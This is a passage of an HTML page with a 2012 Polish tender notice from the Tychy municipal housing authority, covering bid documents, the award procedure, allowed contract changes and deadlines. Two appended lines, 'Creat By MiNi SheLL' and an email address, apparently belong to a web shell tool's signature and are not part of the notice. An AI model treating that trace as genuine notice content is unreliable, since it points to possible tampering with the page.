2)	stosowne pełnomocnictwo (a) do działania w imieniu wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
3)	w przypadku wykonawców wspólnie ubiegających się się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego
4)	 dowód wniesienia wadium
5)	 harmonogram robót zawierający zakres rzeczowo - finansowy realizacji zadania
6)	kosztorys ofertowy sporządzony metodą szczegółową ze stroną tytułową zawierającą składniki cenotwórcze (R-g, Kp, Zysk), do którego należy załączyć zestawienia zbiorcze robocizny, materiałów i sprzętu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:

       1)  zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości stawki VAT;
       2)  wydłużenia terminu zakończenia robót w przypadku wystąpienia robót dodatkowych 
            nie objętych zamówieniem podstawowym, których wykonanie stało się konieczne na skutek 
            sytuacji niemożliwej wcześniej do przewidzenia, jeżeli:
           a)  z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od 
                zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów    
                lub
           b) wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia 
               dodatkowego.  
      3)  wykonania robót zamiennych
      4)  wydłużenia terminu zakończenia robót wyłącznie w sytuacji udokumentowanego 
           wystąpienia niesprzyjających warunków atmosferycznych uniemożliwiających wykonywanie 
           robót na zewnątrz budynku i terenie do niego przyległym -zgodnie z technologią i sztuką 
           budowlaną , pod warunkiem terminowego, zgodnego z umową terminu rozpoczęcia robót.
      5)  zmian personalnych, adresowych, formy prawnej stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.umtychy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny (pokój nr 20) 43-100 Tychy, ul. Filaretów 31
..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2012 godzina 08:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com